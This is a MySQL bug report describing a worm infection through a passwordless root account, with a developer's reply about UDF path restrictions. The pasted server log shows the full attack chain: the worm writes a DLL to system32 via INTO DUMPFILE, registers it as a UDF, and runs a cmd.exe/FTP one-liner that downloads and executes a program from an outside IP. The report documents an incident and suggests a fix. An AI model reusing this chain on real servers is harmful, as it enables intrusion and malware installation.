Bug #29943 Security breach: Loading UDF's / writing to %system%
Submitted: 20 Jul 2007 21:18 Modified: 23 Jul 2007 11:18
Reporter: Tonci Grgin Email Updates:
Status: Won't fix Impact on me:
None 
Category:MySQL Server: User-defined functions ( UDF ) Severity:S1 (Critical)
Version:5.0.44 OS:Microsoft Windows (XP Pro SP2)
Assigned to: CPU Architecture:Any

[20 Jul 2007 21:18] Tonci Grgin
Description:
A virus logged to MySQL server using root account and multiplied it's self across development box.

Here's log of what happened:
070715 15:58:06	      5 Connect     root@87.248.189.178 on mysql
070715 15:58:17	      5 Query       DROP TABLE IF EXISTS clown
		      5 Query       CREATE TABLE clown (line BLOB)
070715 15:58:21	      5 Query       INSERT INTO clown (line) VALUES(0x4D5A9000 --cut--)
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:22	      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/windows/system32/clown.dll'
070715 15:58:23	      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/winnt/system32/clown.dll'
070715 15:58:25	      5 Query       SELECT * FROM clown INTO DUMPFILE 'e:/windows/system32/clown.dll'
070715 15:58:26	      5 Query       SELECT * FROM clown INTO DUMPFILE 'e:/winnt/system32/clown.dll'
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'c:/clown.dll'
070715 15:58:28	      5 Query       SELECT * FROM clown INTO DUMPFILE 'f:/winnt/system32/clown.dll'
070715 15:58:30	      5 Query       SELECT * FROM clown INTO DUMPFILE 'g:/windows/system32/clown.dll'
		      5 Query       SELECT * FROM clown INTO DUMPFILE 'g:/winnt/system32/clown.dll'
070715 15:58:31	      5 Query       SELECT * FROM clown INTO DUMPFILE 'h:/windows/system32/clown.dll'
070715 15:58:32	      5 Query       SELECT * FROM clown INTO DUMPFILE 'h:/winnt/system32/clown.dll'
		      5 Query       CREATE FUNCTION do_system RETURNS integer SONAME 'clown.dll'
070715 15:58:33	      5 Query       SELECT do_system("cmd.exe /c echo open 87.248.189.178 26751 > o&echo user 1 1 >> o &echo get soundvol32.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &soundvol32.exe")
070715 15:58:34	      5 Query       DROP TABLE IF EXISTS clown

How to repeat:
Some info on how this virus manifests externally can be found in Bug#29694.This might be a duplicate of Bug#28341 and a reminder that it should be fixed...

Suggested fix:
We should only load UDF from our directory and never allow writing to that directory from inside MySQL.
[23 Jul 2007 11:18] Sergei Golubchik
In 5.1 there's an option to restrict udf loading from untrusted paths.
In 5.0 users may rely on udfs in the path - we cannot change it.

In either case, there's no bug that a user with FILE and INSERT on mysql.* privileges can run its code. You should not use passwordless root accounts.